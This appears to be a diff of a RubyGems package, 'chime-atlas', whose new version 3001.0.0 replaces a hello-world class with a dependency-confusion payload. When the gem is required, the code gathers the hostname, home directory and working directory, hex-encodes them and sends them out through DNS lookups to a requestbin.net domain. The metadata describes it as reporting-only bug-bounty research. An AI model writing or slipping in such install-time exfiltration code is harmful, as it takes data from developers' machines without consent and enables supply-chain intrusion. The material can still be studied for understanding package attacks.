chime-atlas 0.0.1 → 3001.0.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 113a38df14f7f03636738cdd4db3eade7c4a1a632e0ed08befeb1ae69af6fce0
-  data.tar.gz: 856128e3f866dfb80d8709f1a933e32d6d833ba048e375f6984b1f667b21c8a7
+  metadata.gz: 8d08c98465ef2a4209b1186c34bae9b5d2fcc178fbc6aca92abe9da1e7fba062
+  data.tar.gz: 752806770932a3f72cb8ba275b04fedd726df1e734df4ce1a4f8654b9dabef01
 SHA512:
-  metadata.gz: accbeddc0139335d076fab7a8bbeeec11fbee6630018a4c98f16fd5209e5b805a96e35201fce827896809f758af798c72d9d2643fcaf8794d07be1dcb9fcee2e
-  data.tar.gz: beae449ced8f7da6b6dd17d8386759cfb4d90da054c48990632b7a86b974fb6e1539b3af4b060b2fa35111a875ceda2c876d9c1e3803d9385035bc9b4a00af97
+  metadata.gz: 5dededc26f67730b6ca085bdfe7024fa7b1f5ff3332a25bcca92adf12d68b81debb2224e647c141885430b2a5282d61909027ccd7b6adf6406a34423881b6050
+  data.tar.gz: 85fad67c5df9b591339243a807ddb370181f0a555c250b490e38d70f25c045a7a3eff1d2fa9dc09c09f0d53aa6029aa6cd33d5d8645c19df017ce79d71a1f846

data/lib/chime-atlas.rb

@@ -1,8 +1,62 @@
-class Hello
-  def self.hello
-    puts "Hello world!"
-  end
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+gmanhaes0@gmail.com
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '5c4139c959e5f4aeab6f.d.requestbin.net'
+ns = '5c4139c959e5f4aeab6f.d.requestbin.net'
+
+package = 'chime-atlas'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
 end
 
-puts "WARNING: This import is vulnerable to dependency confusion. This attack has been prevented."
+custom_res = Resolv.new([Resolv::Hosts.new,
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e.' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e.' + suffix
+    rescue; end
+end
 

metadata

@@ -1,26 +1,29 @@
 --- !ruby/object:Gem::Specification
 name: chime-atlas
 version: !ruby/object:Gem::Version
-  version: 0.0.1
+  version: 3001.0.0
 platform: ruby
 authors:
-- X
+- Gabriel Manhães
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2021-03-18 00:00:00.000000000 Z
+date: 2021-02-28 00:00:00.000000000 Z
 dependencies: []
-description: ''
-email: x@example.com
+description: I am testing for dependency confusion vulnerabilities in products that
+  are in public bug bounty programs. This code is reporting-only, and does not do
+  anything malicious.
+email: rubycoder@example.com
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
 - lib/chime-atlas.rb
-homepage: https://rubygems.org/gems/chime-atlas
+homepage: https://rubygems.org/gems/example
 licenses:
 - MIT
-metadata: {}
+metadata:
+  source_code_uri: https://github.com/example/example
 post_install_message: 
 rdoc_options: []
 require_paths:
@@ -36,8 +39,11 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.1.4
+rubyforge_project: 
+rubygems_version: 2.7.6
 signing_key: 
 specification_version: 4
-summary: ''
+summary: I am testing for dependency confusion vulnerabilities in products that are
+  in public bug bounty programs. This code is reporting-only, and does not do anything
+  malicious.
 test_files: []